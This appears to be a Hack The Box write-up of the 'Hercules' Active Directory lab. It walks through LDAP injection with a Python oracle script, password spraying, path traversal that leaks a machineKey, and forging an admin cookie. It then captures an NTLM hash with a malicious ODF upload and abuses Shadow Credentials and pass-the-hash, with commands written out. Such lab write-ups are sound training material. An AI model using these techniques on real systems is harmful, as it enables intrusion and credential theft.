Welcome to another Hack The Box walkthrough. In this post, I walk through how I owned the Hercules machine on Hack The Box, a cybersecurity platform that helps you bridge knowledge gaps and prepares you for cybersecurity jobs.
About the Machine
Hercules is an insane-level Windows Active Directory machine that heavily focuses on advanced AD abuse, certificate services exploitation, and Kerberos delegation attacks. Rather than relying on a single misconfiguration, the machine requires chaining together multiple subtle weaknesses across OU permissions, Shadow Credentials, Active Directory Certificate Services (AD CS), and resource-based constrained delegation (RBCD).
Initial access revolves around understanding delegated rights within Organizational Units, where ownership and GenericAll permissions become the foundation for escalation. From there, the attack path dives deep into modern AD abuse primitives, including Shadow Credentials, certificate template misconfigurations (ESC3 / ESC15), and Enrollment Agent abuse, forcing the attacker to reason carefully about certificate trust relationships and enrollment flows.
The machine further raises the difficulty by introducing disabled accounts, delegated password control, and smartcard-related privileges, requiring precise manipulation of user and computer objects rather than brute-force techniques. Exploitation culminates in abusing S4U2Self / S4U2Proxy via resource-based constrained delegation, allowing full impersonation of the Domain Administrator without ever knowing their password.
Hercules is a technically demanding lab that rewards a strong understanding of Kerberos internals, AD CS abuse, delegation mechanics, and BloodHound-driven attack path analysis. It is an excellent test of real-world Active Directory compromise techniques and is especially well-suited for players aiming to master enterprise-grade Windows domain attacks.
As in my previous writeups, the first step in owning the Hercules machine was to connect my Kali Linux machine to the Hack The Box VPN server. To establish this connection, I ran the following command in the terminal:
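For reference, the connection command looks like this (the .ovpn filename is a placeholder; use the connection pack downloaded from your own HTB profile):

```
sudo openvpn lab_<username>.ovpn
```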
Once the connection between my terminal and the Hack The Box server was established, I started the Hercules machine, which was assigned the IP address 10.10.11.91.
Enumeration with Nmap
I started the enumeration phase by running a comprehensive Nmap scan against the target machine to identify open ports, running services, and potential attack surfaces:
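A representative invocation (flags and output filename are my usual choices, not necessarily the exact ones used here):

```
nmap -sC -sV -p- --min-rate 1000 -oN nmap_full.txt 10.10.11.91
```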
The scan results revealed that the target is a Windows Server machine, most likely part of a domain environment based on the number of Active Directory-related services running. The domain name hercules.htb was also clearly indicated in several service banners and SSL certificates.
Recon: Name Resolution and Web Enumeration
The Nmap output made it obvious we're dealing with an Active Directory domain called hercules.htb and a host named dc.hercules.htb. To make interacting with the HTTPS site straightforward, I added both names to my /etc/hosts:
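The entry maps both names to the target IP:

```
10.10.11.91    hercules.htb dc.hercules.htb
```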
I saved the changes and exited the /etc/hosts configuration screen.
Reading krb5.conf - Kerberos configuration confirms the domain controller
I opened the Kerberos config on my machine to see how the target domain was being resolved locally:
I added the following to the krb5.conf file to pin the Kerberos realm (HERCULES.HTB), point directly at dc.hercules.htb as the KDC/admin server, and disable DNS discovery:
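A minimal configuration matching that description (exact file contents may differ slightly from what I used):

```
[libdefaults]
    default_realm = HERCULES.HTB
    dns_lookup_kdc = false
    dns_lookup_realm = false

[realms]
    HERCULES.HTB = {
        kdc = dc.hercules.htb
        admin_server = dc.hercules.htb
    }

[domain_realm]
    .hercules.htb = HERCULES.HTB
    hercules.htb = HERCULES.HTB
```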
That made our Kerberos enumeration deterministic - we could target the DC directly (or use its IP) with Impacket tools to check for AS-REP and Kerberoastable accounts.
Kerberos User Enumeration with kerbrute
To enumerate valid domain accounts via Kerberos, I ran kerbrute against the domain controller. This tool attempts Kerberos AS-REQs for each username in the supplied wordlist and detects which accounts exist based on the responses (without needing passwords):
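A representative kerbrute invocation (the wordlist filename is illustrative):

```
./kerbrute userenum -d hercules.htb --dc 10.10.11.91 usernames.txt
```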
If you have difficulties running kerbrute command, you can check my Medium post on how to install Kerbrute here.
Output:
What this means and why it matters
- Username enumeration succeeded: kerbrute was able to distinguish between valid and invalid usernames by observing Kerberos responses from the KDC at 10.10.11.91. This gives us a reliable list of accounts that actually exist in the hercules.htb domain.
- Multiple admin variants: seeing admin, administrator, and several case variants suggests the domain contains common privileged accounts (or legacy/default accounts). Even though Kerberos username handling is generally case-insensitive, the presence of these entries is a strong signal that privileged accounts exist and should be tested carefully.
- Service/audit account: auditor is interesting - it may be a low-privilege role or a service-type account that monitors systems. Such accounts sometimes have weak passwords or specific privileges worth investigating.
- Human user: will.s looks like a real user (first name + last-initial pattern). This often makes a good target for password spraying, social engineering, or credential re-use attacks.
The KDC revealed multiple valid accounts, notably several admin/administrator variants, an auditor account, and a user will.s. These confirmed usernames give us targets for AS-REP roasting, Kerberoasting, and carefully throttled password spraying.
Generating username permutations for brute-forcing
After some enumeration I needed a larger username list derived from the short names I already had. I ran a one-liner that expands each base name into 26 variants (name.a → name.z) and writes the result back to disk:
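The one-liner can be reconstructed from the breakdown below. Here is a runnable demo in a scratch directory (paths and sample names are illustrative; the original wrote back to /home/boltech/Desktop/HerculesHTB/names.txt via sudo tee, and writing to a separate file here avoids truncating the input mid-read):

```shell
cd "$(mktemp -d)"
# Sample input with a blank line and stray whitespace
printf 'alice\n\n  bob \n' > names.txt
# Skip blank lines, trim whitespace, expand each name into name.a .. name.z
awk '/^[[:space:]]*$/ {next}
     {gsub(/^[ \t]+|[ \t]+$/,""); for(i=97;i<=122;i++) printf "%s.%c\n", $0, i}' \
    names.txt > names_expanded.txt && echo "[+] names_expanded.txt created"
wc -l < names_expanded.txt   # 52 lines: alice.a..alice.z, bob.a..bob.z
```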
What the command does:
- `awk '/^[[:space:]]*$/ {next}'` skips blank lines in the original file so you don't get empty entries.
- `gsub(/^[ \t]+|[ \t]+$/,"")` trims leading and trailing spaces or tabs from each line (cleaning names like ` alice ` into `alice`).
- `for(i=97;i<=122;i++) printf "%s.%c\n", $0, i` loops, for every cleaned name (`$0`), from ASCII 97 to 122 (letters a → z) and prints name.a, name.b, … name.z on separate lines.
- The awk output is piped to `sudo tee /home/boltech/Desktop/HerculesHTB/names.txt`, which writes the generated list back to the same path; the `> /dev/null` hides tee's output.
- The final `echo` prints a confirmation that the file was created.
Result:
The resulting file now contains 26 permutations per original name. For example, if names.txt originally had:

After the command, it will contain:
Web Enumeration
After setting up proper hostname resolution, I navigated to https://hercules.htb to manually inspect the web application. The site appeared static and minimal, and a full review of the visible content, page source, and client-side resources did not reveal anything immediately exploitable.
Since nothing obvious surfaced through manual inspection, I moved on to directory brute-forcing to uncover hidden endpoints.
Directory Fuzzing
To enumerate hidden paths and files, I used DIRB with the default common.txt wordlist:
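DIRB falls back to its bundled common.txt when no wordlist is given, so the invocation is simply:

```
dirb https://hercules.htb/
```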
This approach is useful for identifying forgotten endpoints, legacy routes, or restricted areas not directly linked from the main page.
DIRB quickly revealed several interesting findings:
- Common IIS-style endpoints such as /index and /default
- Case-insensitive duplicates (/Index, /Default), consistent with a Windows IIS backend
- A redirecting home page: /home → HTTP 302
- Most notably, a login page: /login and /Login (HTTP 200)
The presence of both lowercase and uppercase variants further confirms that the application is hosted on IIS, where URL casing is not strictly enforced.
Static Content Discovery
DIRB also identified a /content/ directory (and its uppercase variant), which contains standard frontend resources:

- /content/css
- /content/js
- /content/assets
- /content/vendors
These directories host static files such as stylesheets, JavaScript, and third-party libraries. While nothing immediately exploitable was found here, they confirm the application follows a structured MVC-style layout typical of ASP.NET applications.
Login Functionality Analysis
From directory fuzzing, a login endpoint was identified at /Login.
Initial manual testing confirmed the page is protected by rate limiting. After approximately 10 failed authentication attempts, the application responds with an HTTP 429 - Too Many Requests, temporarily blocking further attempts for roughly 30 seconds. This effectively prevents traditional brute-force and password spraying attacks against the web login.
Because of this restriction, further exploitation required a logic flaw rather than credential guessing.
Authentication Backend Behavior
Intercepting the login request with Burp Suite revealed that the application submits credentials via a POST request to /Login, including a standard ASP.NET anti-CSRF token (__RequestVerificationToken).
More importantly, the application returns distinct error messages depending on backend evaluation:
- “Invalid username.”
- “Login attempt failed.”
This discrepancy strongly suggests that the login process validates the username separately from the password, and that backend directory queries are leaking information through response behavior.
Given the environment (IIS + Active Directory), this indicates the login form is authenticating against an LDAP/Active Directory backend.
LDAP Injection Hypothesis
LDAP authentication commonly relies on a search filter similar to:
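An illustrative filter (the application's real filter was not visible, but it plausibly resembles this, with the bind or password check performed afterwards):

```
(&(objectClass=user)(sAMAccountName={username}))
```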
If user input is embedded directly into the LDAP filter without proper escaping, it becomes possible to manipulate the filter logic. LDAP filters support wildcards, logical operators, and grouping, making them a frequent target for injection attacks.
The goal here was not to bypass authentication outright, but to extract sensitive directory attributes, specifically the description field of a user object.
Injection Strategy
By injecting a crafted payload into the username field, it is possible to append additional LDAP clauses. Conceptually, the payload attempts to transform the original filter into something like:
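Conceptually, with a payload like `johnathan.j)(description=a*` in the username field, the resulting filter (illustrative, not the application's literal query) becomes:

```
(&(objectClass=user)(sAMAccountName=johnathan.j)(description=a*))
```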
If the injected filter evaluates to a valid LDAP object, the application responds with “Login attempt failed”. If it evaluates to no results, the application responds with “Invalid username.” This behavior effectively turns the login endpoint into a boolean oracle.
Encoding Requirements
A raw LDAP payload such as:
failed immediately and returned “Invalid username”, indicating the payload was being sanitized or broken before reaching the LDAP backend.
Further testing showed that double URL-encoding was required. Because IIS / ASP.NET performs intermediate decoding, special characters must be encoded twice (% → %25) so that the final decoded payload reaches LDAP intact.
Example injected payload:
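The double-encoding step is easy to reproduce. This sketch (the payload string is illustrative) shows how a raw injection payload is URL-encoded twice so that `%` survives the intermediate IIS/ASP.NET decode as `%25`:

```python
from urllib.parse import quote

# Hypothetical payload: close the username clause and test whether
# the description attribute starts with "a"
payload = "*)(description=a*"
once = quote(payload, safe="")    # single URL-encoding
twice = quote(once, safe="")      # double: every '%' becomes '%25'
print(twice)                      # %252A%2529%2528description%253Da%252A
```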
When submitted via Burp Repeater, this payload resulted in:
This confirms that the LDAP filter was successfully evaluated and that the description attribute exists and matched the injected condition.
Exploitation Outcome
With a working injection primitive and a reliable response oracle, the description attribute can now be reconstructed character by character using a prefix-based approach:
- Test whether description starts with a, then b, then c, and so on.
- A positive match returns "Login attempt failed".
- A negative match returns "Invalid username".
Despite rate limiting, this method remains viable because it requires controlled, low-frequency requests, not brute force.
Given the context of the challenge, it is highly likely that the description field contains sensitive information, such as credentials or hints intended for lateral movement.
Automating LDAP Description Enumeration
With a working LDAP injection primitive confirmed, the next step was to automate data extraction. Manually probing each character would be slow and error-prone, especially with rate limiting in place, so I wrote a custom Python script (bruteforce.py) to enumerate LDAP description fields programmatically:
The script targets the /Login endpoint and faithfully replicates a legitimate authentication flow:
- It fetches a fresh CSRF token (__RequestVerificationToken) for every request
- Maintains session cookies using requests.Session()
- Submits crafted username payloads while supplying a dummy password
- Uses the application’s response message as a boolean oracle
A response containing “Login attempt failed” indicates that the injected LDAP filter evaluated to a valid object, whereas “Invalid username” means the filter returned no results.
Injection Logic
For each known domain user, the script first checks whether the account has a populated description attribute by injecting:
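Before double URL-encoding, the presence-check payload (with `<user>` standing in for each enumerated username) looks like:

```
<user>)(description=*
```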
If this condition evaluates as true, the script then enumerates the value character by character, using a prefix-based approach:
Each request tests whether the description begins with the supplied prefix. A positive match confirms the next character and advances the enumeration.
Because IIS and ASP.NET preprocess requests, the payload is double URL-encoded before submission to ensure the LDAP backend receives the injection intact.
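The core logic can be sketched as follows. Names here are illustrative, not the original bruteforce.py: the real script also fetches a fresh __RequestVerificationToken and posts to /Login with requests.Session(), whereas this sketch abstracts the HTTP layer into an `oracle` callable that returns True when the portal answers "Login attempt failed":

```python
import string
from urllib.parse import quote

# LDAP-special characters (*, parentheses, backslash) are deliberately left
# out of the charset: they would need escaping inside the injected filter.
CHARSET = string.ascii_letters + string.digits + "_@#!$%^&-+=.?"

def build_payload(user: str, prefix: str) -> str:
    """Close the username clause, test a description prefix, double URL-encode."""
    raw = f"{user})(description={prefix}*"
    return quote(quote(raw, safe=""), safe="")

def enumerate_description(user: str, oracle, max_len: int = 64) -> str:
    """Recover the description attribute one confirmed character at a time."""
    recovered = ""
    for _ in range(max_len):
        for c in CHARSET:
            if oracle(build_payload(user, recovered + c)):
                recovered += c
                break
        else:
            break  # no character extends the prefix: value fully recovered
    return recovered
```

Passing a real HTTP oracle (one that submits the payload and inspects the response message) to `enumerate_description` reproduces the character-by-character extraction described above.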
Enumeration Results
Running the script against the previously enumerated domain users produced mostly negative results. For the majority of accounts, the application consistently responded that no description field existed, indicating either empty attributes or restricted visibility.
However, one account (johnathan.j) immediately stood out:
At this point, the script successfully began reconstructing the description value one character at a time. Each confirmed character produced a positive oracle response, allowing the full string to be recovered incrementally.
The final extracted value was change*th1s_p@ssw()rd!!, which the script recorded as:
Impact
This confirms that sensitive credentials were stored directly in the LDAP description attribute, a critical security misconfiguration. Despite rate limiting and the absence of brute-force opportunities, the application’s verbose error handling and unsafe LDAP query construction enabled full credential disclosure via blind injection.
At this stage, valid domain credentials have been obtained without ever authenticating successfully through the web application.
Verifying the Harvested Credentials
After extracting what appeared to be valid domain credentials from the LDAP description attribute, the next step was to verify whether these credentials could be used for directory authentication.
To do this, I used NetExec (nxc) to attempt an LDAP bind against the domain controller, explicitly targeting the LDAP service on port 389 and supplying the recovered credentials for johnathan.j.
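A representative command for that check (flag spelling per current NetExec; the password is the value recovered above):

```
nxc ldap 10.10.11.91 --port 389 -u johnathan.j -p 'change*th1s_p@ssw()rd!!'
```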
Since this was the first execution of NetExec on the system, it initialized its workspace and protocol databases before performing the authentication attempt.
LDAP Service Discovery
NetExec successfully identified the target as a Domain Controller belonging to the hercules.htb Active Directory domain:
This confirmed that the LDAP service was reachable and responding as expected, ruling out network-level issues.
Authentication Failure Analysis
Despite LDAP being accessible, the authentication attempt failed with the following error:
This Kerberos error indicates that the supplied credentials failed Kerberos pre-authentication, meaning the password provided for johnathan.j was not accepted by the Key Distribution Center (KDC).
In practice, this suggests one of the following:
- The extracted value is not the actual account password, but rather a hint or temporary value
- The password may have been changed since it was stored in the LDAP description
- The account could be restricted from Kerberos authentication
- Or the credential is intended for a different service, not standard domain login
LDAP Injection via Username Field
Based on earlier Kerberos enumeration, the username johnathan.j was confirmed to exist. However, attempting to log in normally resulted in the generic “Login attempt failed” message, as shown in the screenshot.
At this point, attention shifted to how the backend processed the Username field. The behavior strongly suggested that the application was constructing an LDAP query directly from user input, without proper sanitization.
By injecting a crafted payload that:
- prematurely closes the username filter, and
- appends an LDAP condition such as:
it became possible to test whether any directory object’s description attribute started with a given prefix.
This effectively turned the login page into a boolean oracle for LDAP attribute content.
Kerberos Prep: Time Synchronization
Before attempting to reuse the recovered credential against Kerberos-backed services, the local system clock was synchronized with the domain controller:
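One common way to do this (ntpdate against the DC; other tools such as rdate or faketime work too):

```
sudo ntpdate 10.10.11.91
```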
Kerberos authentication is highly time-sensitive, and even small clock skews can result in authentication failures. Syncing time ensured that subsequent Kerberos-based attacks would not fail for environmental reasons.
Spraying the Recovered Credential Against Domain Users
After extracting the string change*th1s_p@ssw()rd!! from the LDAP description attribute earlier, the next logical step was to determine which account this credential actually belonged to. Given the wording, it strongly resembled a reused or default password rather than something unique to johnathan.j.
To test this hypothesis, I compiled all previously enumerated domain users into a single file, users.txt, and performed a credential spray against the domain controller using nxc over LDAP:
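A representative spray command (--continue-on-success keeps testing after a hit, matching the goal below):

```
nxc ldap 10.10.11.91 -u users.txt -p 'change*th1s_p@ssw()rd!!' --continue-on-success
```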
The goal here was simple:
- reuse the recovered password,
- test it across all known users,
- and continue testing even after a successful authentication.
Interpreting the LDAP Spray Results
Most authentication attempts failed with the following Kerberos error:
This error is significant. It confirms that:
- the username exists in the domain, and
- the password is incorrect for that account.
In other words, the password itself is valid Kerberos input, but it does not match the majority of users - exactly what we would expect during a password spray. However, one result immediately stood out:
This line indicates a successful authentication against the domain controller using Kerberos. Unlike the surrounding failures, no pre-authentication error was returned, confirming that the credentials are valid for the ken.w account.
Authenticated Portal Access & File Download Abuse
Using the recovered credentials (ken.w : change*th1s_p@ssw()rd!!), I successfully authenticated to the Hercules Portal and was redirected to the user dashboard.
In the left-hand corner of the portal there were several hyperlinks. One that caught my eye was "Mail", so I opened it and found three messages with the subjects "Site Maintenance", "Important", and "From the Boss".
I then pivoted to the Downloads section from the left-hand navigation menu. This page exposed three downloadable resources tied to internal workflows:
- Form 1 – Registration (user onboarding)
- Form 2 – Applications (application management)
- Form 3 – Feedback (issue reporting)
Given that these downloads were served dynamically, this immediately raised the possibility of insecure file handling.
Intercepting the Download Request
With Burp Suite interception enabled, I clicked Form 1: Registration. The portal issued the following request:
This indicated that the backend was directly consuming a fileName parameter - suggesting a potential path traversal vulnerability.
Path Traversal to Sensitive Configuration
To validate this, I modified the request in Burp Repeater to reference a known sensitive file within ASP.NET applications:
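A representative modified request (the endpoint path and traversal depth here are illustrative; only the fileName parameter name is known from the intercepted request):

```
GET /Home/DownloadFile?fileName=..%2f..%2fweb.config HTTP/1.1
Host: hercules.htb
Cookie: <authenticated session cookie>
```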
High-Impact Information Disclosure
The leaked configuration file contained highly sensitive cryptographic material, including the application’s <machineKey>:
In ASP.NET environments, the machineKey is used to:
- Encrypt and decrypt authentication cookies
- Validate ViewState
- Protect forms authentication tickets
Exposure of these keys enables cookie forging, session hijacking, and potentially authentication bypass across the entire application.
Preparing a Legacy Authentication Cookie Tooling Environment
With the ASP.NET machineKey values extracted earlier, the next step was to recreate the target’s authentication mechanism locally in order to forge valid legacy authentication cookies. Since the application appeared to be running on an older ASP.NET stack, I needed a way to generate Forms Authentication cookies compatible with legacy ASP.NET.
To do this, I initialized a fresh .NET console project:
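The project was scaffolded with the standard template command:

```
dotnet new console -n LegacyAuthConsole
```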
This created a minimal .NET 6.0 console application, which would serve as a controlled environment for crafting authentication cookies. The output confirms that the project template was created successfully and that all required dependencies were restored.
Immediately, I moved into the directory LegacyAuthConsole:
Adding Legacy ASP.NET Cookie Compatibility
Modern .NET Core does not natively support legacy ASP.NET Forms Authentication cookies. To bridge this gap, I added the AspNetCore.LegacyAuthCookieCompat NuGet package:
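The package is added from inside the project directory:

```
dotnet add package AspNetCore.LegacyAuthCookieCompat
```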
This package is specifically designed to generate and validate legacy ASP.NET authentication cookies using known machineKey values. During installation, NuGet automatically pulled in all required dependencies, including cryptographic and runtime libraries necessary for cross-platform compatibility.
Although the output is verbose, the key takeaway is that the package was installed successfully and the project now supports:
- Legacy Forms Authentication ticket creation
- Cookie encryption and signing using the extracted machineKey values
- Compatibility with the older ASP.NET authentication logic used by the target application
Forging a Legacy ASP.NET Authentication Cookie
With the machineKey values successfully extracted from web.config, the next objective was to forge a valid ASP.NET Forms Authentication cookie. Since the application relied on legacy FormsAuth rather than modern authentication mechanisms, this opened the door to a full authentication bypass.
To accomplish this, I created a custom Program.cs file that manually constructs and encrypts a FormsAuthenticationTicket using the leaked cryptographic material.
The code performs the following steps:
1. Reuse the application's cryptographic secrets - the validationKey and decryptionKey were copied directly from web.config. These keys are responsible for signing (HMAC-SHA256) and encrypting (AES) Forms Authentication cookies.
2. Normalize the validation key - ASP.NET truncates validation keys when using HMACSHA256, so to ensure byte-perfect compatibility with the target application, the validation key is trimmed to the expected length before use.
3. Recreate a privileged authentication ticket - a FormsAuthenticationTicket was generated for the user web_admin, assigning it:
   - a valid issue and expiry timestamp
   - a non-persistent session
   - custom userData set to Web Administrators, matching the expected role format
4. Encrypt and sign the ticket - using LegacyFormsAuthenticationTicketEncryptor, the ticket was encrypted and signed exactly as the target server would do internally.
After restoring dependencies and building the project, the application was executed locally. The output was a long hexadecimal string - a fully valid, server-trusted Forms Authentication cookie:
Why This Works
ASP.NET Forms Authentication relies entirely on the secrecy of the machineKey. Since both the encryption and validation keys were exposed, the server has no way to distinguish between a legitimately issued cookie and one forged offline.
At this point, authentication is effectively broken:
- No credentials are required
- No password guessing is involved
- Privileged access is achieved purely through cryptographic abuse
The generated cookie can now be injected into the browser session, granting instant access as web_admin and allowing further privilege escalation within the application.
Pivoting to Admin Functionality via Forged Cookie
Back in the Hercules Portal, I clicked the Forms section and noticed the application exposes a file upload feature. At this point, the earlier machineKey disclosure became a full authentication break: by injecting the forged FormsAuth cookie into the browser's cookie store, the portal immediately treated my session as belonging to the higher-privileged user web_admin.
The UI confirmed the privilege change right away - the displayed username switched from ken.w to web_admin, proving the server accepted the cookie as legitimate and granted admin-level access without needing a password.
Weaponizing the Upload: Forcing Outbound Authentication
With admin access and an upload workflow available, the next goal was to turn that feature into a credential capture primitive.
In many Windows environments, when a server (or a user reviewing a submission) opens a document that references an external network resource, Windows may automatically attempt to authenticate to that resource using NTLM. If we control the destination, we can capture the resulting NetNTLMv2 challenge-response.
So instead of uploading a normal document, I generated a specially crafted ODF/ODT file designed to trigger a background request to my attacker host.
Crafting a Malicious ODF to Trigger NTLM Authentication
With admin access to the portal and a file upload feature available, the next move was to generate a document that would force the target environment to reach out to my machine and attempt Windows authentication. The goal here is to capture a NetNTLMv2 challenge-response, which can later be cracked offline or used in follow-on attacks.
To keep everything clean, I built the payload generator inside an isolated Python virtual environment.
Setting Up the Tooling Environment
I first created and activated a virtual environment:
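The setup is the standard venv workflow (the environment name is my choice):

```shell
# Create and activate an isolated Python environment for the payload generator
python3 -m venv badodf-venv
. badodf-venv/bin/activate
```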
Then I created a working directory and installed the two dependencies required by the Bad-ODF generator:
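The working-directory name is my choice; the two dependencies are those named in the generator's output:

```
mkdir bad-odf && cd bad-odf
pip install ezodf lxml
```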
The output shows ezodf was built successfully and both ezodf and lxml were installed without issues.
Fetching and Running the Bad-ODF Generator
Next, I pulled the generator script directly from GitHub:
With the script downloaded, I ran it:
A small SyntaxWarning about an escape sequence appeared, but it does not impact functionality - Python is simply warning about how ASCII art is printed.
The script then prompted for the listener IP. I provided my VPN interface address:
This value is embedded into the document so that when the file is opened or processed, it attempts to retrieve remote content from my machine - triggering Windows to send an NTLM authentication attempt.
The script then outputs a file (e.g., bad.odt) crafted to reference an attacker-controlled path, so that when the file is processed, Windows attempts NTLM authentication outward.
Abusing the Admin Upload to Trigger NTLM Authentication
With the forged web_admin session cookie in place, I refreshed the portal and confirmed the privilege escalation was successful - the interface now clearly identified me as web_admin. This unlocked functionality that was previously out of reach, most notably the Forms section.
Inside Forms → Report Submission, I found a classic administrative workflow: users can submit reports along with an uploaded file. From an attacker’s perspective, this is a perfect execution point - a backend process is very likely to open, parse, or otherwise handle uploaded documents.
At this stage, the plan was simple:
- I already had a malicious ODF document (bad.odt) crafted to force outbound authentication.
- I had Responder listening on my VPN interface.
- I had admin privileges, meaning fewer restrictions or content checks.
I filled in the required form fields with arbitrary data and selected bad.odt as the uploaded file. Nothing fancy - the payload lives entirely inside the document structure itself.
Once the file was uploaded and submitted, the trap was set.
Capturing the NetNTLMv2 Hash
While the malicious file was uploaded through the portal, I also started a listener on my attack box to catch any outbound authentication attempts.
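The listener was Responder bound to the VPN interface (interface name is an assumption; adjust to your tunnel):

```
sudo responder -I tun0 -v
```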
Once the portal processed the upload, the listener received an NTLM authentication attempt from the target side, resulting in a captured NetNTLMv2 hash.
In practice, this confirms two key things:
- The portal’s upload workflow leads to server-side handling/review (or triggers a process that opens/parses the document).
- That handling path can be abused to force NTLM authentication leakage, turning a simple “upload” feature into a credential capture vector.
Offline Password Cracking
With the hash safely captured, the next step was offline cracking. Since NetNTLMv2 hashes are designed to be crackable with sufficient wordlists, I fed the hash into John the Ripper, using the standard rockyou.txt wordlist:
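A representative invocation (the hash filename is illustrative; John auto-detects the netntlmv2 format from Responder's output):

```
john --wordlist=/usr/share/wordlists/rockyou.txt natalie_ntlmv2.hash
```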
The result came back almost instantly:
This confirmed valid plaintext credentials for the domain user natalie.a.
Mapping Active Directory with BloodHound
With valid domain credentials in hand (ken.w : change*th1s_p@ssw()rd!!), the next logical step was to enumerate the Active Directory environment and identify possible privilege-escalation or lateral-movement paths. For this, I turned to BloodHound.
I used bloodhound-python to collect a full dataset from the domain:
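A representative collection command (the nameserver IP is the target as assigned in my session):

```
bloodhound-python -u ken.w -p 'change*th1s_p@ssw()rd!!' -d hercules.htb -ns 10.10.11.91 -c All --zip
```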
BloodHound successfully authenticated and obtained a Kerberos TGT, confirming the credentials were valid for domain enumeration. It then connected to the LDAP service on dc.hercules.htb and began harvesting directory data.
From the output, BloodHound identified:
- 1 domain (hercules.htb)
- 1 forest
- 1 computer (the domain controller)
- 49 user accounts
- 62 security groups
- 9 organizational units (OUs)
- 2 Group Policy Objects (GPOs)
- 19 containers
- 0 external trusts
Once LDAP enumeration completed, BloodHound queried the domain controller directly for computer-level information and finalized the dataset.
The entire collection process completed in under a minute and was packaged into a ZIP archive:
The next step was to understand how privilege delegation was structured inside the HERCULES Active Directory environment. Rather than guessing escalation paths, I enumerated and visualized trust relationships using BloodHound.
After collecting the data with bloodhound-python and importing the resulting ZIP file into the BloodHound GUI, the domain’s internal relationships became much clearer.
Key Findings from BloodHound
The BloodHound graph immediately revealed several high-impact misconfigurations:
1. Natalie A. → Web Support
Natalie A. is a member of the Web Support group.
2. Remote Management Group
Both Auditor and Ashley B. are members of Remote Management Users.
These relationships exposed clear privilege escalation paths:
- A compromised Web Support user can directly modify other users via GenericWrite.
- Members of Security Helpdesk can reset passwords for multiple users, potentially escalating to higher-privileged accounts.
- Chained together, these misconfigurations provide a reliable route from a low-privileged foothold to broader domain control.
Instead of blindly attacking services, BloodHound allowed me to prioritize targets based on actual permissions, significantly reducing guesswork and noise.
Requesting a Kerberos TGT (Validating Domain Access)
With valid credentials for natalie.a now confirmed, the next step was to verify whether these credentials were usable for Kerberos-based authentication within the domain. To do this, I requested a Ticket Granting Ticket (TGT) directly from the Domain Controller using Impacket:
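A representative request (the cracked password is a placeholder, as it is not reproduced here):

```
impacket-getTGT 'hercules.htb/natalie.a:<cracked password>' -dc-ip 10.129.242.196
export KRB5CCNAME=natalie.a.ccache
```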
The request was sent to the DC at 10.129.242.196, authenticating as hercules.htb\natalie.a with the recovered password. The successful response indicated that the credentials were fully valid and accepted by Kerberos.
Impacket automatically saved the issued TGT to a local credential cache file (natalie.a.ccache). This cache can be reused for Kerberos-aware tools without needing to supply the plaintext password again, enabling pass-the-ticket style attacks and Kerberos-authenticated enumeration or exploitation.
Abusing Shadow Credentials to Impersonate bob.w
After confirming that I had a valid Kerberos ticket for natalie.a, I moved on to abusing Shadow Credentials to impersonate another user. From the earlier BloodHound analysis, I identified that Natalie had sufficient permissions over the bob.w account, making it a viable target for this attack.
To perform the abuse, I reused Natalie’s Kerberos ticket by exporting the credential cache and executed Certipy’s shadow module to automatically inject a malicious Key Credential into Bob’s account:
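The commands below sketch that step, assuming Certipy v4-style syntax (flag names can vary between Certipy releases):

```shell
# Reuse Natalie's TGT instead of a password
export KRB5CCNAME=natalie.a.ccache

# Add a temporary Key Credential to bob.w's msDS-KeyCredentialLink,
# authenticate with the resulting certificate, recover his NT hash,
# then restore the attribute to its original value
certipy shadow auto -k -no-pass -u 'natalie.a@hercules.htb' \
    -account bob.w -dc-ip 10.129.242.196
```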
Certipy generated a certificate and temporarily added a Key Credential to Bob’s msDS-KeyCredentialLink attribute. This allowed me to authenticate as bob.w using certificate-based authentication without knowing his password. I successfully requested a Kerberos Ticket Granting Ticket (TGT) for Bob, which was saved locally as bob.w.ccache.
After authenticating as Bob, I retrieved his NTLM hash and allowed Certipy to restore the original Key Credentials, cleaning up the modification. At this stage, I had fully compromised the bob.w account and obtained reusable credentials for further lateral movement or privilege escalation.
Requesting a Kerberos TGT Using Pass-the-Hash for bob.w
After successfully extracting the NTLM hash for bob.w, I proceeded to verify that the hash was usable for Kerberos authentication. Instead of relying on plaintext credentials, I attempted a pass-the-hash attack to request a Ticket Granting Ticket (TGT) directly from the Domain Controller.
To do this, I used Impacket’s getTGT module and supplied Bob’s NTLM hash while targeting the Domain Controller at 10.129.242.196:
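A minimal sketch of the pass-the-hash TGT request; `<NT_HASH>` is a placeholder for the extracted hash, and Impacket expects the `-hashes` value as `LMHASH:NTHASH` (the LM half can be left empty):

```shell
# Request a TGT for bob.w using only his NT hash (pass-the-hash)
impacket-getTGT 'hercules.htb/bob.w' -hashes ':<NT_HASH>' \
    -dc-ip 10.129.242.196

# Use the resulting cache for subsequent Kerberos-aware tooling
export KRB5CCNAME=bob.w.ccache
```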
Enumerating Writable Active Directory Objects as bob.w
After successfully obtaining a Kerberos ticket for bob.w, I wanted to understand exactly what level of access this account had within the Active Directory environment. Rather than guessing the next escalation path, I decided to enumerate all directory objects where Bob had write or create permissions, as these often lead directly to privilege escalation opportunities.
Using Bob’s Kerberos ticket cache, I queried Active Directory with bloodyAD to list all writable objects in detail. I ran the following command while explicitly reusing the Kerberos ticket:
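That query can be sketched as follows, assuming the DC resolves as `dc01.hercules.htb` (the actual hostname on the box may differ):

```shell
# Authenticate with Bob's cached TGT
export KRB5CCNAME=bob.w.ccache

# List every AD object bob.w can write to, with per-permission detail
bloodyAD --host dc01.hercules.htb -d hercules.htb -k get writable --detail
```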
The output revealed that bob.w had extensive write permissions across multiple Organizational Units (OUs), groups, and user objects. Most notably, Bob had CREATE_CHILD permissions on several high-value OUs, including the Engineering Department, Security Department, and Web Department. This meant I could create new users, groups, or computers inside these OUs - a powerful primitive for Active Directory abuse.
Beyond OU-level control, I also identified direct WRITE permissions over several user and group objects. This included the ability to modify attributes such as name and cn on multiple users, and more critically, deep write access to the Bob Wood user object itself, including sensitive attributes like msDS-AllowedToActOnBehalfOfOtherIdentity, certificate-related attributes, and login metadata.
The presence of write access over security-sensitive attributes strongly indicated multiple viable escalation paths, including delegation abuse, certificate-based attacks, or account manipulation. At this stage, I had confirmed that compromising bob.w was not a dead end - it provided broad control over key directory objects and opened the door to domain-level privilege escalation.
Installing PowerView.py for Further AD Enumeration
After confirming that I had meaningful write access in Active Directory as bob.w, I wanted a flexible way to perform deeper LDAP-based enumeration and quickly query ACLs, groups, and object attributes from the command line. For that, I decided to install PowerView.py, a Python reimplementation of PowerView-style AD recon.
To keep my system clean and avoid dependency conflicts, I first created and activated a dedicated virtual environment:
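The environment setup is straightforward; the directory name `powerview-env` here is just an illustrative choice:

```shell
# Create an isolated Python environment and activate it
python3 -m venv powerview-env
source powerview-env/bin/activate
```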
